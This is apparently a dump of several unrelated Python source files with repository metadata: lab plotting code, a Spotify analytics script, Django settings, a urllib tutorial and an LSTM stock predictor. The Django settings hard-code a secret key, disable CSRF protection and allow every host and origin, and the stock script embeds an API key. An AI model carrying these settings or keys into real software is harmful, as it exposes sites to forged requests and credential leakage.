        plt.savefig(savepath+'linearity_plot.png')
    if ionlim=='all':
        plt.axis([-1,10,0,1.25*fit[ut.bound_finder(fitx,[10])[0]]+np.mean(np.take(ints,xe))])
        if savepath!=False:
            plt.savefig(savepath+'linearity_plot_small.png')
    # Make the Linearity Plot for Subtracted Data
    plt.figure('linearity sub')
    plt.clf()
    plt.plot(np.delete(ions,xe),np.delete(ints_sub,xe),'bo')
    plt.plot(ions_sub_0,ints_sub_0,'go')
    plt.plot(fitx,fit,'r--')
    plt.xlabel('Number of Ions in Laser Region')
    plt.title(str(date)+ ' Linearity Plot Subtracted',fontsize=12)
    plt.ylabel('Integrated Counts per mW in First Frame ('+str(xwidth)+'x'+str(ywidth)+' Region)')
    ut.textbox('Counts/Ion: '+str(round(params_line[0],2)),[.05,.95])
    for label,x,y in zip(np.delete(labels,xe),np.delete(ions,xe),np.delete(ints_sub,xe)):
        plt.annotate(label,xy=(x,y),xytext=(5,5),textcoords='offset points',ha = 'right',va ='bottom')
    ut.zero(bounds=[-1,1.2*np.amax(ions)])
    if np.amax(ints_sub)>=1E3:
        ut.sci()
    plt.show()
    if ionlim=='all':
        plt.axis([-1,10,-200,1.25*fit[ut.bound_finder(fitx,[10])[0]]])
        if savepath!=False:
            plt.savefig(savepath+'linearity_plot_sub_small.png')
    plt.axis([-1,1.05*np.amax(ions),-200,1.25*np.amax(ints_sub)])
    if savepath!=False:
        plt.savefig(savepath+'linearity_plot_sub.png')
    # Plot the Xe runs and statistics
    xe_ave,xe_std=np.mean(np.take(ints,xe)),np.std(np.take(ints,xe))
    plt.figure('xe runs')
    plt.clf()
    plt.plot(range(1,len(xe)+1),np.take(ints,xe),'bo')
    plt.xlim(0,len(xe)+2)
    ut.hline(xe_ave,legend=False)
    plt.xlabel('Xe Run')
    plt.ylabel('Integrated Counts per mW in First Frame ('+str(xwidth)+'x'+str(ywidth)+' Region)')
    plt.title(str(date)+' Counts per mW of Xe-only runs')
    for label,x,y in zip(np.take(labels,xe),range(1,len(xe)+1),np.take(ints,xe)):
        plt.annotate(label,xy=(x,y),xytext=(5,5),textcoords='offset points',ha = 'right',va ='bottom')
    ut.textbox('Average: '+str(round(xe_ave,1))+'\nStDev: '+str(round(xe_std,1)),[.05,.95])
    if savepath!=False:
        plt.savefig(savepath+'xe_only_runs.png')
    return ions,ints,ints_sub,xe,zp,runlist
#------------------------------------------------------------------------------------------
def laser_overlay(positions,w,**kwargs):
    """Overlay gaussian laser spots at *positions* and plot the coverage map.

    Parameters
    ----------
    positions : (n, 2) array of (x, y) spot centers in micron.
    w : [wx, wy] 1/e^2 beam widths in micron.

    Keyword args: store (True: return results), fit_gauss (also fit a 2D
    gaussian to the summed coverage), savepath / savefile (figure output).
    Returns (laser_cov, area[, params]) when store=True.
    """
    store=kwargs.get('store',True)
    fit_gauss=kwargs.get('fit_gauss',False)
    savepath=kwargs.get('savepath',False)
    savefile=kwargs.get('savefile',False)
    import matplotlib as mpl
    # BUGFIX: plt was used below but never imported in this function
    # (only 'matplotlib as mpl' was), unlike the sibling functions
    import matplotlib.pyplot as plt
    import numpy as np
    import utility as ut
    import funk
    mean_pos=[np.mean(positions[:,0]),np.mean(positions[:,1])]
    range_pos=[np.absolute(np.amax(positions[:,0])-np.amin(positions[:,0])),np.absolute(np.amax(positions[:,1])-np.amin(positions[:,1]))]
    # 500x500 grid padded 1.5 beam widths beyond the extreme positions
    x=np.linspace(np.amin(positions[:,0])-1.5*w[0],np.amax(positions[:,0])+1.5*w[0],500)
    y=np.linspace(np.amin(positions[:,1])-1.5*w[1],np.amax(positions[:,1])+1.5*w[1],500)
    laser_cov=np.zeros((500,500))
    # Sum a unit-amplitude gaussian at every position
    for i in range(np.shape(positions)[0]):
        laser_cov+=funk.gauss2dw(x,y,1.,positions[i,0],positions[i,1],w[0],w[1])
    if fit_gauss==True:
        params=ut.gaussfit2d(laser_cov,x,y,[10,mean_pos[0],mean_pos[1],w[0],w[1]])
    # Area of the coverage map above the 1/e fold
    area=ut.e_fold_area(laser_cov,x,y)
    plt.figure('laser')
    plt.clf()
    plt.imshow(np.flipud(laser_cov),extent=[x[0],x[-1],y[0],y[-1]])
    plt.colorbar(orientation='vertical')
    plt.xlabel('x (micron)')
    plt.ylabel('y (micron)')
    ut.textbox('w_x: '+str(w[0])+'micron\nw_y: '+str(w[1])+'micron\nArea: '+str(round(area,2))+'sq.micron',[.05,.25],fontsize=10)
    plt.show()
    if savepath!=False:
        ut.create_dir(savepath)
        plt.savefig(savepath+'laser_area.png')
    if savefile!=False:
        plt.savefig(savefile)
    if store==True:
        if fit_gauss==True:
            return laser_cov,area,params
        if fit_gauss==False:
            return laser_cov,area
#------------------------------------------------------------------------------------------
def gauss2d_fit(filename,fitbnds,**kwargs):
    """Fit a 2D gaussian to each frame of a 0-order image.

    *fitbnds* = [x0,x1,y0,y1] restricts the fit region.  Returns an array
    with one row per fitted frame:
    [amp, xcenter+1, ycenter+1, xwidth, ywidth].

    NOTE(review): at least one caller in this file unpacks three return
    values (param, cov, fr) -- verify the expected return signature.
    """
    frames=kwargs.get('frames','all')
    speed=kwargs.get('speed','slow')
    import numpy as np
    import utility as ut
    import funk
    from lmfit import minimize,Parameters,Parameter,Model
    # Import data and remove cosmics with im_sub_dark
    x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed=speed)
    # Slice data for just fit bounds
    data=pix[:,fitbnds[2]:fitbnds[3]+1,fitbnds[0]:fitbnds[1]+1]
    x,y=np.arange(fitbnds[0],fitbnds[1]+1),np.arange(fitbnds[2],fitbnds[3]+1)
    if frames=='all':
        frames=range(1,N+1)
    # Define 2d gaussian (flattened so lmfit can compare it to raveled data)
    def gauss2d_flat(x,y,amp,xcenter,ycenter,xwidth,ywidth): # This ends up as f(y,x)
        my,mx=np.meshgrid(x,y)
        xwidth,ywidth=xwidth/2.,ywidth/2.
        return np.ravel(amp*np.exp(-2*(np.square(mx-ycenter)/(np.square(ywidth))))*np.exp(-2*(np.square(my-xcenter))/(np.square(xwidth))))
    param_all,frames_fit=[],[]
    # Initial guess: amplitude 500, center of the fit box, width 2 px
    p0=[500,np.mean([fitbnds[0],fitbnds[1]]),np.mean([fitbnds[2],fitbnds[3]]),2,2]
    p_0s=['amp','xcenter','ycenter','xwidth','ywidth']
    # Build the model once instead of on every iteration
    func_model=Model(gauss2d_flat,independent_vars=['x','y'],param_names=p_0s)
    for i in frames:
        # BUGFIX: each fit previously raveled the whole 3D stack, so the data
        # length never matched the single-frame model output; fit the 1-based
        # frame i's 2D slice instead (as center_find does)
        result=func_model.fit(np.ravel(data[i-1,:,:]),x=x,y=y,amp=p0[0],xcenter=p0[1],ycenter=p0[2],xwidth=p0[3],ywidth=p0[4],verbose=False)
        param_all.append([result.best_values['amp'],result.best_values['xcenter']+1,result.best_values['ycenter']+1,result.best_values['xwidth'],result.best_values['ywidth']])
        frames_fit.append(i)
    param_all=np.array(param_all)
    return param_all
#------------------------------------------------------------------------------------------
def scan_corr(scan1,scan2,rng):
    """Mean-subtracted cross-correlation of two scans over integer shifts.

    *rng* = [x_range, y_range]: scan2 is shifted by every integer pair in
    -x_range..x_range and -y_range..y_range, each overlap-normalised
    correlation is recorded, and the map is shown in figure 'correlation'.
    Returns (corr, shift): the correlation map and the [i, j] shifts in
    evaluation order.
    """
    import numpy as np
    # BUGFIX: ut and plt were used below but never imported in this
    # function, unlike the sibling functions in this file
    import matplotlib.pyplot as plt
    import utility as ut
    corr,shift=[],[]
    for i in np.arange(-rng[0],rng[0]+1):
        for j in np.arange(-rng[1],rng[1]+1):
            # Compute the shifted scan once per (i, j) instead of twice
            shifted=ut.int_shift(scan2,i,j,val=0)
            corr.append(np.sum((scan1-np.mean(scan1))*(shifted-np.mean(shifted)))/((np.shape(scan1)[0]-abs(i))*(np.shape(scan1)[1]-abs(j))))
            shift.append([i,j])
    # NOTE(review): the reshape groups rows of length 2*rng[0]+1 although the
    # inner loop varies j (2*rng[1]+1 values) -- verify the row/column
    # ordering when rng[0] != rng[1]
    corr=np.transpose(np.array(corr).reshape(2*rng[1]+1,2*rng[0]+1))
    plt.figure('correlation')
    plt.imshow(corr,interpolation='nearest',origin='lower',extent=[-rng[0],rng[0],-rng[1],rng[1]])
    return corr,shift
#------------------------------------------------------------------------------------------
def scan_chi2(scan1,scan2,rng):
    """Overlap-normalised squared difference of two scans over integer shifts.

    *rng* = [x_range, y_range]: scan2 is shifted by every integer pair in
    -x_range..x_range and -y_range..y_range and the per-overlap mean squared
    difference is recorded; the map is shown in figure 'correlation'.
    Returns (corr, shift): the chi^2 map and the [i, j] shifts in
    evaluation order.
    """
    import numpy as np
    # BUGFIX: ut and plt were used below but never imported in this
    # function, unlike the sibling functions in this file
    import matplotlib.pyplot as plt
    import utility as ut
    corr,shift=[],[]
    for i in np.arange(-rng[0],rng[0]+1):
        for j in np.arange(-rng[1],rng[1]+1):
            corr.append(np.sum(np.square(scan1-ut.int_shift(scan2,i,j,val=0)))/((np.shape(scan1)[0]-abs(i))*(np.shape(scan1)[1]-abs(j))))
            shift.append([i,j])
    # NOTE(review): the reshape groups rows of length 2*rng[0]+1 although the
    # inner loop varies j (2*rng[1]+1 values) -- verify the row/column
    # ordering when rng[0] != rng[1]
    corr=np.transpose(np.array(corr).reshape(2*rng[1]+1,2*rng[0]+1))
    plt.figure('correlation')
    plt.imshow(corr,interpolation='nearest',origin='lower',extent=[-rng[0],rng[0],-rng[1],rng[1]])
    return corr,shift
| [
"chrischambers89@gmail.com"
] | chrischambers89@gmail.com |
96c23484a0920d0be9ee54cdb89c588c505d99fb | 61158f7d7f20accc4e960cf90691116b192b956c | /main.py | b8d6b8ec9f65c46a1c136a47733502bdcb81345a | [] | no_license | asdfMaciej/spotify-analytics | c110ac9e107753c010511a2ebb1ce212eed8c798 | c62e6cb2b3e23f112c7cc58f02743779911ba815 | refs/heads/master | 2021-01-21T17:29:18.496087 | 2017-05-21T13:28:36 | 2017-05-21T13:28:36 | 91,955,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,911 | py | import requests, json, sqlite3
from pprint import pprint
class Playlist:
    """Lightweight record describing a Spotify playlist."""

    def __init__(self, name: str, id: str, owner: str):
        """Store the playlist's display name, Spotify id and owner id."""
        self.name = name
        self.id = id
        self.owner = owner

    def __str__(self):
        """Render as 'id - owner - name', the format used by the listing."""
        return f"{self.id} - {self.owner} - {self.name}"
class User:
    """Lightweight record describing a Spotify user."""

    def __init__(self, display_name: str, id: str):
        """Store the user's display name and Spotify id."""
        self.display_name = display_name
        self.id = id

    def __str__(self):
        """Render as 'id - display_name'."""
        return f"{self.id} - {self.display_name}"
class Fetcher:
    """Thin wrapper around the Spotify Web API using a stored OAuth token.

    The bearer token is read from the local file ``oauth.txt`` at
    construction time and sent on every request.
    """

    def __init__(self):
        # Logical API-call names mapped to URL templates (%s placeholders
        # are filled from the ``params`` argument of fetch_api).
        self.pages = {
            'get_user_playlists': "https://api.spotify.com/v1/users/%s/playlists",
            'get_current_user': "https://api.spotify.com/v1/me",
            'get_playlist_tracks': "https://api.spotify.com/v1/users/%s/playlists/%s/tracks",
            'get_tracks_features': "https://api.spotify.com/v1/audio-features"
        }
        self.oauth_token = self.get_oauth()
        self.headers = {'Authorization': 'Bearer '+self.oauth_token}

    def get_oauth(self) -> str:
        """Read the OAuth bearer token from the local oauth.txt file."""
        with open('oauth.txt', 'r') as f:
            return f.read()

    def fetch_page(self, url: str) -> str:
        """GET *url* with the auth header and return the raw response body."""
        with requests.Session() as session:
            response = session.get(url, headers=self.headers)
            return str(response.text)

    def fetch_json(self, url: str) -> dict:
        """GET *url* and decode the response body as JSON."""
        return json.loads(self.fetch_page(url))

    def fetch_api(self, api_call: str, params=None, optionals=None) -> dict:
        """Call a named API endpoint and return its decoded JSON payload.

        api_call: key into self.pages.
        params: sequence filling the URL template's %s slots.
        optionals: mapping appended as query-string key=value pairs.

        The defaults are None rather than the original mutable []/{} so
        that call sites can never share accidental state between calls.
        """
        params = [] if params is None else params
        optionals = {} if optionals is None else optionals
        url = self.pages[api_call] % tuple(params)
        if optionals:
            url += "?"
            for key, value in optionals.items():
                url += key+"="+str(value)+"&"
        return self.fetch_json(url)
class SqliteExport:
    """Tiny SQLite sink for the exported song-feature rows."""

    # Column order must match the rows produced by the fetching script.
    _COLUMNS = (
        'id', 'title', 'danceability', 'energy', 'key', 'loudness', 'mode',
        'speechiness', 'acousticness', 'instrumentalness', 'liveness',
        'valence', 'tempo', 'duration_ms',
    )

    def __init__(self, fname: str):
        """Open (or create) the database file and ensure the table exists."""
        self.con = sqlite3.connect(fname)
        self.cur = self.con.cursor()
        # IF NOT EXISTS replaces the original "uncomment on first launch"
        # commented-out CREATE TABLE, so a fresh database just works.
        self.cur.execute(
            'CREATE TABLE IF NOT EXISTS piosenki (' + ', '.join(self._COLUMNS) + ');')
        self.con.commit()

    def delete(self):
        """Remove every previously exported row."""
        self.con.execute('DELETE FROM piosenki;')
        self.con.commit()

    def close(self):
        """Commit outstanding work and release the connection."""
        self.con.commit()
        self.con.close()

    def export(self, d: list):
        """Bulk-insert rows; each row must follow the _COLUMNS order."""
        query = ('INSERT INTO piosenki (' + ', '.join(self._COLUMNS) +
                 ') VALUES (' + ', '.join('?' * len(self._COLUMNS)) + ');')
        self.cur.executemany(query, d)
        self.con.commit()  # persist even if the caller forgets close()
class Parser:
    """Convert raw Spotify API JSON payloads into domain objects."""

    def p_playlists(self, json_dict: dict) -> list:
        """Build a Playlist object for each entry of a playlists payload."""
        return [
            Playlist(item['name'], item['id'], item['owner']['id'])
            for item in json_dict['items']
        ]

    def p_user(self, json_dict: dict) -> object:
        """Build a User object from a user-profile payload."""
        return User(json_dict['display_name'], json_dict['id'])

    def ids_from_playlist(self, json_dict: dict) -> dict:
        """Map each track id in a playlist payload to 'Artist - Title'."""
        labels = {}
        for entry in json_dict['items']:
            track = entry['track']
            first_artist = track['album']['artists'][0]['name']
            labels[track['id']] = first_artist + " - " + track['name']
        return labels
# Wire up the JSON parser and the authenticated API client.
prsr = Parser()
ftch = Fetcher()
"""
0nctmSV1j6bc6CJBpOCEVz - 1191584733 - Dopracowane pereลki
7sP34VAMpoB9IDY6Hw1C4J - 1191584733 - Imprezowe
6P7FpSCVS0788uHO2QaasY - 1191584733 - Dobra muzyka - po prostu.
3NvqgfDX4gnjo8MHUwKuSP - 1191584733 - Rock, ew. metal
5hU005cVJ6YxukoH0aWCyK - 1191584733 - Polskie, gลรณwnie pop
0ASbkhRRPIcEMc6eMFoyQT - 1191584733 - House/trance/itp
4jxLNcEcXo3pAyGzMxQYV8 - 1191584733 - Rap
"""
# Resolve the current user's id, then list their playlists for reference.
user_id = prsr.p_user(ftch.fetch_api('get_current_user')).id
plays = prsr.p_playlists(ftch.fetch_api('get_user_playlists', [user_id]))
for p in plays:
    print(p)
# The tracks endpoint pages 100 items at a time: fetch two pages of the
# hard-coded "Rap" playlist (id above) and merge them into one dict.
ids_list_one = prsr.ids_from_playlist(
    ftch.fetch_api('get_playlist_tracks',
        [user_id, '4jxLNcEcXo3pAyGzMxQYV8'],
        {'offset': 0}))
ids_list_two = prsr.ids_from_playlist(
    ftch.fetch_api('get_playlist_tracks',
        [user_id, '4jxLNcEcXo3pAyGzMxQYV8'],
        {'offset': 100}))
ids_list = {**ids_list_one, **ids_list_two}
# The audio-features endpoint caps each request at 100 comma-joined ids.
# NOTE(review): the second batch slices [100:-1], dropping the final id --
# presumably unintentional; confirm.
cool_ids = ','.join(list(ids_list.keys())[:100])
cool_ids2 = ','.join(list(ids_list.keys())[100:-1])
csv_list = [[
    'id', 'title', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness',
    'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms'
]]
# Fetch audio features per batch and flatten each track into one row.
for x in (cool_ids, cool_ids2):
    xD = ftch.fetch_api('get_tracks_features', optionals={'ids':x})
    for i in xD['audio_features']:
        csv_list.append([
            i['id'], ids_list[i['id']], i['danceability'], i['energy'], i['key'], i['loudness'], i['mode'],
            i['speechiness'], i['acousticness'], i['instrumentalness'], i['liveness'], i['valence'],
            i['tempo'], i['duration_ms']
        ])
# Persist everything except the header row, then dump for inspection.
sq = SqliteExport('piosenki.db')
sq.delete()
sq.export(csv_list[1:])
sq.close()
print(csv_list)
| [
"maciej.kaszkowiak@gmail.com"
] | maciej.kaszkowiak@gmail.com |
5a4a2020d8ce189068d89b8f22fae33cdb7961ef | 9a2fbca24f00e28cb3c68ea52c0999970bf628b2 | /backend/mysite/mysite/settings.py | 68e777ef01650f2c936710f21ebc06a7773f25d6 | [] | no_license | yashikacac/DJ-DayStrom | 47a568ec2af8e172d9f9269039b485043b198794 | b50a63994e982c9fce3b8be9e289fe63f1836ddb | refs/heads/master | 2022-12-11T08:58:25.782043 | 2020-09-20T05:10:24 | 2020-09-20T05:10:24 | 296,817,808 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,208 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control -- rotate it and load
# it from an environment variable before any deployment.
SECRET_KEY = 'x0c8_*w)&(^=l_=*e#$lz_qeywvquk73ag^$k74_id*j8sa2x0'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# '*' accepts any Host header -- acceptable for local development only.
ALLOWED_HOSTS = ['*']

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'corsheaders',
    'app',
    'users',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    # NOTE(review): CsrfViewMiddleware is commented out, disabling CSRF
    # protection site-wide -- confirm this is intentional.
    # 'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/

STATIC_URL = '/static/'
MEDIA_URL = '/media/'

# Allows cross-origin requests from any origin (django-cors-headers) --
# development-only setting; tighten for production.
CORS_ALLOW_ALL_ORIGINS = True
| [
"dewanshrawat15@gmail.com"
] | dewanshrawat15@gmail.com |
1cf91c973076f5cd1c46e4f58e68999f1a89e80d | a2f67003e0eededb0c2d7645d83243d19af71340 | /exam_subject/Subject/apps/topic/migrations/0010_answer_analysis.py | 117680a8d906da18fcca8540dbfdcda5856ebd05 | [] | no_license | john123951/SubjectSystem | c6bf118627aa54ba56bd367f73528e66f51dcd58 | a7f8e6014f81ec4376f3c5f437a280e801ab22e4 | refs/heads/master | 2020-07-13T16:36:15.663952 | 2019-06-19T07:02:14 | 2019-06-19T07:02:14 | 205,115,935 | 7 | 0 | null | 2019-08-29T08:23:00 | 2019-08-29T08:22:59 | null | UTF-8 | Python | false | false | 422 | py | # Generated by Django 2.0.2 on 2019-05-05 22:15
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds Answer.analysis, a 500-char
    # text field defaulting to ''.
    # NOTE(review): the verbose_name string below appears mojibake-garbled;
    # the original was presumably UTF-8 Chinese for "analysis" -- confirm
    # against the repository before re-encoding.

    dependencies = [
        ('topic', '0009_examtime_exam_number'),
    ]

    operations = [
        migrations.AddField(
            model_name='answer',
            name='analysis',
            field=models.CharField(default='', max_length=500, verbose_name='่งฃๆ'),
        ),
    ]
| [
"you@example.com"
] | you@example.com |
44b3b47ff12130c5430ed3f41a26362427382fac | 3f21a05258ccee066f1a6758089b41ed0ba6ce88 | /33. urllibtutorialvid.py | a41f50965404371538fe24d835665967b90c4079 | [
"MIT"
] | permissive | JatinR05/Python-3-basics-series | 1ad4def14df5b735efc8ece3c33570fe2eebb6fc | e4b3d8056e2074602c9ed0cd201676484dd0d179 | refs/heads/master | 2022-12-09T11:30:53.043250 | 2020-09-30T17:05:16 | 2020-09-30T17:05:16 | 299,991,764 | 0 | 0 | MIT | 2020-09-30T17:03:13 | 2020-09-30T17:03:13 | null | UTF-8 | Python | false | false | 1,018 | py |
import urllib.request
import urllib.parse
#x = urllib.request.urlopen('https://www.google.com')
#print(x.read())
'''
url = 'http://pythonprogramming.net'
values = {'s':'basic',
'submit':'search'}
data = urllib.parse.urlencode(values)
data = data.encode('utf-8')
req = urllib.request.Request(url,data)
resp = urllib.request.urlopen(req)
respData = resp.read()
print(respData)
'''
try:
x = urllib.request.urlopen('https://www.google.com/search?q=test')
print(x.read())
except Exception as e:
print(str(e))
try:
url = 'https://www.google.com/search?q=test'
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17'
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = resp.read()
saveFile = open('withHeaders.txt','w')
saveFile.write(str(respData))
saveFile.close()
except Exception as e:
print(str(e))
| [
"harrison@sentdex.com"
] | harrison@sentdex.com |
b7a5aac51b6dbc6469dca15ebc3fba5e91728859 | ee348632cc65d0e77d7b8709f600667d27565e6a | /stockacm.py | 2f21aca35fb6d6feb6e4821462ee0c794e1d1c8f | [
"MIT"
] | permissive | KhondokerTanvirHossain/stock-market-exchange-prediction | b2247cd3fc51b61e705ee8a9d0aa80b59b6cef0a | 9cd2e9c94b38692473d4113ecbad96e3408fbeb1 | refs/heads/master | 2020-06-04T15:42:49.221830 | 2019-06-15T21:06:21 | 2019-06-15T21:06:21 | 192,086,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,221 | py | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
from keras.models import model_from_json
import math
from sklearn.metrics import mean_squared_error
import requests
from textblob import TextBlob
#dataset_main = pd.read_csv('Google_Stock_Price_Train.csv')
#dataset = dataset_main.iloc[0:1259, 1:2].values
# Read the ACM daily price history into a list of single-element rows.
# tokens[1] is the price column (presumably the open price -- confirm the
# file's header layout).
# Fixes two defects of the original loop: the file handle was never closed,
# and the initial [[]] placeholder drifted to the end of the list as an
# empty row, which MinMaxScaler cannot ingest.
dataset = []
with open("Stocks/acm.us.txt", "r") as file:
    for count, line in enumerate(file):
        if count == 0:
            continue  # first line is the CSV header row
        tokens = line.split(',')
        dataset.append([float(tokens[1])])
# Scale prices into [0, 1] for the LSTM.
sc = MinMaxScaler(feature_range = (0, 1))
dataset_scaled = sc.fit_transform(dataset)
def train():
    """Train a one-layer LSTM on the scaled price series and save it to disk.

    Plots the raw and scaled series, fits the model to predict the next
    day's scaled price from the current one (X = rows 0..2499, y = rows
    1..2500), then writes the architecture to modelTempantm.json and the
    weights to modelTempantm.h5.
    """
    #training_set = dataset.iloc[0:4001, 2:3].values
    #training_set_scaled = sc.fit_transform(training_set)
    plt.plot(dataset, color = 'blue', label = 'Price')
    plt.title('Price')
    plt.xlabel('Time')
    plt.ylabel('Price')
    plt.legend()
    plt.show()
    X_train = []
    y_train = []
    # One-step-ahead supervision: target is the input shifted by one day.
    X_train = dataset_scaled[0:2500]
    y_train = dataset_scaled[1:2501]
    plt.plot(X_train, color = 'red', label = 'Scaled Price')
    plt.title('Scaled Price')
    plt.xlabel('Time')
    plt.ylabel('Price')
    plt.legend()
    plt.show()
    X_train, y_train = np.array(X_train), np.array(y_train)
    # LSTM expects (samples, timesteps, features).
    X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
    regressor = Sequential()
    regressor.add(LSTM(units = 4, activation = 'sigmoid', input_shape = (None, 1)))
    regressor.add(Dense(units = 1))
    regressor.compile(optimizer = 'adam', loss = 'mean_squared_error')
    regressor.fit(X_train, y_train, epochs = 200, batch_size = 32)
    model_json = regressor.to_json()
    with open("modelTempantm.json", "w") as json_file:
        json_file.write(model_json)
    regressor.save_weights("modelTempantm.h5")
    print("Saved model to disk")
def load():
    """Evaluate the saved model on rows 2501..2599 and plot the result.

    Reloads the architecture/weights written by train(), predicts the
    held-out slice, un-scales the predictions, plots predicted vs. real
    prices, and prints an RMSE figure.
    """
    test_set = dataset[2501:2600]
    #test_set_scaled = sc.transform(test_set)
    test_set_scaled = dataset_scaled[2501:2600]
    json_file = open('modelTempantm.json', 'r')
    loaded_model_json = json_file.read()
    json_file.close()
    loaded_model = model_from_json(loaded_model_json)
    # load weights into new model
    loaded_model.load_weights("modelTempantm.h5")
    print("Loaded model from disk")
    test_set_reshaped = np.reshape(test_set_scaled, (test_set_scaled.shape[0], test_set_scaled.shape[1], 1))
    predicted_temprature = loaded_model.predict(test_set_reshaped)
    # Map predictions back to the original price scale.
    predicted_temprature = sc.inverse_transform(predicted_temprature)
    fig_size = plt.rcParams["figure.figsize"]
    fig_size[0] = 12
    fig_size[1] = 5
    plt.rcParams["figure.figsize"] = fig_size
    plt.plot(predicted_temprature, color = 'blue', label = 'Predicted Price')
    plt.plot(test_set, color = 'red', label = 'Real Price')
    plt.title('Price Prediction')
    plt.xlabel('Time')
    plt.ylabel('Price')
    plt.legend()
    plt.show()
    # NOTE(review): the RMSE is divided by 10 -- the reason is not visible
    # here; confirm whether this scaling is intentional.
    rmse = math.sqrt(mean_squared_error(test_set, predicted_temprature)) / 10
    print (rmse)
def prediction():
    """Predict prices for rows 2600..2609 with the saved model.

    Returns the inverse-scaled predictions as a 2-D array of shape
    (10, 1) -- one row per forecast day.
    """
    #test_set = dataset_main.iloc[4001:4101, 2:3].values
    #test_set_scaled = sc.transform(test_set)
    test_set_scaled = dataset_scaled[2600:2610]
    json_file = open('modelTempantm.json', 'r')
    loaded_model_json = json_file.read()
    json_file.close()
    loaded_model = model_from_json(loaded_model_json)
    # load weights into new model
    loaded_model.load_weights("modelTempantm.h5")
    test_set_reshaped = np.reshape(test_set_scaled, (test_set_scaled.shape[0], test_set_scaled.shape[1], 1))
    predicted_temprature = loaded_model.predict(test_set_reshaped)
    # Map predictions back to the original price scale before returning.
    predicted_temprature = sc.inverse_transform(predicted_temprature)
    #print(predicted_temprature)
    return predicted_temprature
def senti():
    """Average sentiment polarity of recent news about the ACM stock.

    Queries NewsAPI for matching articles and averages the TextBlob
    polarity of each article description.  Returns 0.0 when no usable
    article comes back (the original raised ZeroDivisionError) and skips
    articles whose description is missing (the original crashed TextBlob).
    """
    # NOTE(review): API key is committed to source -- move to config/env.
    url = ('https://newsapi.org/v2/everything?q=%20acm%20stock%20market&apiKey=6e593f373865401e803d6874594f9063')
    response = requests.get(url)
    parsed_json = response.json()
    articles = parsed_json['articles']
    polarity = 0.0
    count = 0
    for article in articles:
        description = article['description']
        if not description:
            # No text to analyse; skip instead of crashing.
            continue
        blob = TextBlob(description)
        count = count + 1
        polarity = polarity + blob.sentiment.polarity
    if count == 0:
        return 0.0
    return polarity / count
def run():
    """Print a 10-day ACM price forecast plus a news-sentiment verdict.

    Fixes two defects in the original: the loop printed only 9 of the 10
    predicted rows (range(0, 9)), and the hand-rolled date rollover reset
    the day *before* printing the 31st, skipping it entirely.  Dates now
    come from datetime arithmetic, starting at the same hard-coded
    10-1-2019 the original used.
    """
    from datetime import date, timedelta
    print('Prediction of acm Stock Price in Next 10 Days :')
    p = prediction()
    s = senti()
    print("Date Price")
    start = date(2019, 1, 10)
    for i in range(10):
        day = start + timedelta(days=i)
        print(str(day.day) + "-" + str(day.month) + "-" + str(day.year) + ": " + str(p[i][0]))
    print('news polarity : ' + str(s))
    if s > 0.5 :
        print('User Demand Is Very High')
    elif s > 0:
        print('User Demand Is High')
    elif s < -0.5:
        print('User Demand Is Very Low')
    elif s < 0:
        print('User Demand IS Low')
| [
"k.tanvir.hossain@gmail.com"
